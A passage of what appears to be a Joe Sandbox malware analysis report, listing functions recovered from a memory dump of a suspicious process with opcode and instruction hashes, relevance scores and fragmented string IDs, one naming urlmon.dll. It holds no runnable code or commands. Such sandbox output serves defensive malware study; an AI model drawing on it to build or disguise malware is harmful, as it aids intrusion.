                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 25b18df5678153bc5923fa7573696ab297a4478d8ab3a4e71ffa8f91d7ab67c5
                                                                        • Instruction ID: b647f17ab1e6d9e05105fa808c7f57418ab576b71b42d6ed6781a9e233a1a199
                                                                        • Opcode Fuzzy Hash: 25b18df5678153bc5923fa7573696ab297a4478d8ab3a4e71ffa8f91d7ab67c5
                                                                        • Instruction Fuzzy Hash: 8E11A3763803057BF320DE598C82FAB336C9B98B51F244014FB08AE2C1DAA4F8114AB5
                                                                        Function 031B2182 Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46a6bf4ad95f33546e795f44d6ff258994b1487d7f7f38bc391b9097c11bbe26
                                                                        • Instruction ID: 733a0325996c91185789929f9c37a11d938034f1367cda63e20b7bf4d5b30a8e
                                                                        • Opcode Fuzzy Hash: 46a6bf4ad95f33546e795f44d6ff258994b1487d7f7f38bc391b9097c11bbe26
                                                                        • Instruction Fuzzy Hash: 7F119075901309ABE720EB68CC41FEBB3BCEF89700F10465EF9189B241DB7569118BA5
                                                                        Function 031B2002 Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8cf869b84da2e677cde3e514bf77ca522b6e9b483428207a7ca8a5e1cae373bf
                                                                        • Instruction ID: ee2a8602a82b1b580b93730e11358a49a2b6f4af96866633311d4ba2d1923511
                                                                        • Opcode Fuzzy Hash: 8cf869b84da2e677cde3e514bf77ca522b6e9b483428207a7ca8a5e1cae373bf
                                                                        • Instruction Fuzzy Hash: 80116075A01705ABE720EF64CC41FEB73BCEF89700F10461DF9199B241DB7569118BA5
                                                                        Function 031B3032 Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                        • Instruction ID: 2442d230d8c047f8f953507cbbaad554c33ae06e2d962abecfcf2566567bd37c
                                                                        • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                        • Instruction Fuzzy Hash: CC0180B6205648BBCB54DF9DDC80EDB77ADAF8C714F508209BA19E7241D630FC518BA4
                                                                        Function 0318D606 Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 872b5861ad906b79e2e7362d2992326f6859f65e7f74ac74b166600d9d952870
                                                                        • Instruction ID: a6d710b386ac1b975e62fa54da4da12d186667710a6c6147722c77cddc990928
                                                                        • Opcode Fuzzy Hash: 872b5861ad906b79e2e7362d2992326f6859f65e7f74ac74b166600d9d952870
                                                                        • Instruction Fuzzy Hash: CDF0BB7350531A67D714AF5DFC80B96F79CEB89230F340526F95C8B282DB35D4528790
                                                                        Function 031A18FD Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 25ecb6bf2a448980e5a57064e2dd1879b49d137cb7a586a0f03e4685d1d0a6e8
                                                                        • Instruction ID: e91534f27f336da9ccba6ef51412b9c7fe5e306ae56aeffad2e6716928240e9d
                                                                        • Opcode Fuzzy Hash: 25ecb6bf2a448980e5a57064e2dd1879b49d137cb7a586a0f03e4685d1d0a6e8
                                                                        • Instruction Fuzzy Hash: 62F0F6758103186EEF10EBE5CC45EEA73389F88311F008395E9086A180FB3049458BA6
                                                                        Function 031B2282 Relevance: .0, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4691c96d8d81143b437ca4f97799bd03263fa4e70748146f5b0961e75674bf37
                                                                        • Instruction ID: 4870cc2224e61f0274882ced3c2ce6d57e3d249b60edc7d0879843c16ba829c0
                                                                        • Opcode Fuzzy Hash: 4691c96d8d81143b437ca4f97799bd03263fa4e70748146f5b0961e75674bf37
                                                                        • Instruction Fuzzy Hash: 70F0F876204205BBDB10EF99DC81EDB77ACEFC8754F008509FA18AB241D770B9258BB4
                                                                        Function 031A1862 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be98c509030c2ea581b490eed3ebf59809605963665b9a2a60d9c613e3bd7c53
                                                                        • Instruction ID: 1f13437fb9674467ba4384879a3ec94c0124d372a082af47f4100b20261c25eb
                                                                        • Opcode Fuzzy Hash: be98c509030c2ea581b490eed3ebf59809605963665b9a2a60d9c613e3bd7c53
                                                                        • Instruction Fuzzy Hash: 9FF08275C15209EBDB14CF68D841BDDBBB9EB04320F1087A9E824DB280E73497548781
                                                                        Function 031B2F52 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                        • Instruction ID: 59c5b79bb53155f1227772a6ffe7bd62d583245cce8dd0addd2f93501c28d3a5
                                                                        • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                        • Instruction Fuzzy Hash: 34E032B6204204BBD714EE98DC40EEB77ACEF88750F00440AF908AB281D630BA208AB4
                                                                        Function 031B4DE2 Relevance: .0, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 473c746b910a85d1364797c5b8ce6b0ed0b6d8d67083c2f15317aaf68b8c99ac
                                                                        • Instruction ID: c075c20f00983efa689e5b952958fd126c912c7040d76e57a42061151c2fcf55
                                                                        • Opcode Fuzzy Hash: 473c746b910a85d1364797c5b8ce6b0ed0b6d8d67083c2f15317aaf68b8c99ac
                                                                        • Instruction Fuzzy Hash: 29E04F37A4121427D620958B9C05FEBB76CDBD9A61F0A4178FE0C9B341EA78A91182E5
                                                                        Function 031A185F Relevance: .0, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 186e6c7721f9e7ab4cb97c2fe40417233b977bf3aeaacd3eae27a4da6970f6de
                                                                        • Instruction ID: a804ca2349e56e10bb02a3c59c36c2ccac281471c40b85b2e3ee23da51ab155e
                                                                        • Opcode Fuzzy Hash: 186e6c7721f9e7ab4cb97c2fe40417233b977bf3aeaacd3eae27a4da6970f6de
                                                                        • Instruction Fuzzy Hash: 67E06575915109EBDB08CF64E880ADDB7A9EF08310F1447B9E815DB140D73987909780
                                                                        Function 031B2C22 Relevance: .0, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                        • Instruction ID: a70362d94d15c8eca4036b668069048e5bda3f08302b37e2eba30cac943f5115
                                                                        • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                        • Instruction Fuzzy Hash: D1E0463A200204BBE220EB69DC41FDB776CDFC9714F00451AFA08AB242C671BA208BB0
                                                                        Function 03194526 Relevance: .0, Instructions: 12COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e71ed52656dfc4b7cdc0347ed633a100226924e151a86e57b8e9a362a6aa50c1
                                                                        • Instruction ID: fba67af63d39cb7d975e5bafef67c8fca2e43752c2ac18a2019ec97bd3c1b0ac
                                                                        • Opcode Fuzzy Hash: e71ed52656dfc4b7cdc0347ed633a100226924e151a86e57b8e9a362a6aa50c1
                                                                        • Instruction Fuzzy Hash: 00C02BDC1186D6570F67FB3412909FB3F2355273043F919D0ECC68C20BD6C0C9294209

                                                                        Non-executed Functions

                                                                        Function 031AC122 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                        • API String ID: 0-1002149817
                                                                        • Opcode ID: ce336ed1213236cd1af306e2b9385ac0025bfbbd7f3c3f5c4b04c9987333ccc7
                                                                        • Instruction ID: 2d42984d2ab96e631707f03824c5fae6341b2dcf527efc489e15bb8b148719bb
                                                                        • Opcode Fuzzy Hash: ce336ed1213236cd1af306e2b9385ac0025bfbbd7f3c3f5c4b04c9987333ccc7
                                                                        • Instruction Fuzzy Hash: 51C11FB5D013289FDF60DFA5CC44BEEBBB9AF49304F0081D9D548AB241D7B55A888F61
                                                                        Function 0318D2B3 Relevance: 16.3, Strings: 13, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$Z\XA\Y$\Y$^V^Y$o
                                                                        • API String ID: 0-1090279348
                                                                        • Opcode ID: bcd071c43341f0b16623e491c83721323b743e5ce182ae81e6e774fcb8420ee1
                                                                        • Instruction ID: 51a0d21dc53d519c2f6dc2f7344e64e66c0906fb58ba6a6ad07e244e9ccd5565
                                                                        • Opcode Fuzzy Hash: bcd071c43341f0b16623e491c83721323b743e5ce182ae81e6e774fcb8420ee1
                                                                        • Instruction Fuzzy Hash: F821FBB0C01388AACB00CFE1E999ACDBBB4FB14345F208598D9657B201C7794A5A8F85
                                                                        Function 031983BC Relevance: 13.8, Strings: 11, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                        • API String ID: 0-685823316
                                                                        • Opcode ID: 13c0f166920ac541ee47a58fac03eceaae2673d556e2d8852e67614461d8d907
                                                                        • Instruction ID: 36be60605d68cb40deac8d6dfa55fb9b3606723d380b20926e1b9e18dd9a1cc1
                                                                        • Opcode Fuzzy Hash: 13c0f166920ac541ee47a58fac03eceaae2673d556e2d8852e67614461d8d907
                                                                        • Instruction Fuzzy Hash: BE31A2B5D11318ABEF50DFD4CC45BEEB7B9AF08704F00815DE618BA180DBB516488BA5
                                                                        Function 0319F85D Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .$P$e$i$m$o$r$x
                                                                        • API String ID: 0-620024284
                                                                        • Opcode ID: 479994489971b5be046ffe758a185202d1abf4df93a57e4d86fadde2066cee02
                                                                        • Instruction ID: 81949ab1b54d0b3340806be198a843ea3989b4630296646b742f0206caf41c39
                                                                        • Opcode Fuzzy Hash: 479994489971b5be046ffe758a185202d1abf4df93a57e4d86fadde2066cee02
                                                                        • Instruction Fuzzy Hash: 8D4165B5811318B7EB21DBA5DC41FEA737CAF58300F00859DE609AB141EBB557498FA1
                                                                        Function 031A3BFE Relevance: 6.5, Strings: 5, Instructions: 202COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $i$l$o$u
                                                                        • API String ID: 0-2051669658
                                                                        • Opcode ID: b4ea47b01b7898c9864b84b28d9626ce08109d28a33f87d693356b7b357a4a3e
                                                                        • Instruction ID: ee85cdee71c39987aa7af20b9323764babc54d60f151d01f85f45e2a348f918d
                                                                        • Opcode Fuzzy Hash: b4ea47b01b7898c9864b84b28d9626ce08109d28a33f87d693356b7b357a4a3e
                                                                        • Instruction Fuzzy Hash: A16150BA900704AFDB24DBA8CC84FEFB7FDAF48710F144959E519A7240E735AA45CB60
                                                                        Function 031A3892 Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $e$k$o
                                                                        • API String ID: 0-3624523832
                                                                        • Opcode ID: 7ed2013f33c7443f5a17a214e74812ffc78b8b754efadb3e995bc0177c4c79b3
                                                                        • Instruction ID: 24e0dcee5222f6bb79c4cf3914184d454d5bd09ae83dbc6fe5e585d240f6ba32
                                                                        • Opcode Fuzzy Hash: 7ed2013f33c7443f5a17a214e74812ffc78b8b754efadb3e995bc0177c4c79b3
                                                                        • Instruction Fuzzy Hash: FFB11CB9A00704AFDB24DBA8C885FEFB7FDAF88700F148958F65997240D775AA41CB50
                                                                        Function 031A41CB Relevance: 5.2, Strings: 4, Instructions: 239COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $e$h$o
                                                                        • API String ID: 0-3662636641
                                                                        • Opcode ID: b86888f39945026197ae74827de75efca9d8e2664e076802944b34d9c2a88cf6
                                                                        • Instruction ID: 383e8122db999afb0fb3fe3fc96a0667c66a4c8f0417b21e103153dff4dc5cc0
                                                                        • Opcode Fuzzy Hash: b86888f39945026197ae74827de75efca9d8e2664e076802944b34d9c2a88cf6
                                                                        • Instruction Fuzzy Hash: 188150B68012186BDB25DB55CC85FFEB37CEF5C300F44859AE609AA140EF745B458BA1
                                                                        Function 031A41D2 Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $e$h$o
                                                                        • API String ID: 0-3662636641
                                                                        • Opcode ID: 1214df47e0ef03c80a2cea39ad4e4dfb3cfc067ccdb1f28c8b83395e691c4ee7
                                                                        • Instruction ID: 87c4a5ae66d8037becb93efd836169be846a6d836bd1f7880f22308f1eb18789
                                                                        • Opcode Fuzzy Hash: 1214df47e0ef03c80a2cea39ad4e4dfb3cfc067ccdb1f28c8b83395e691c4ee7
                                                                        • Instruction Fuzzy Hash: F8413175C01318ABEB50DBA5CC41FEEB378EF48700F4085AAE60DAB151EB746B848F95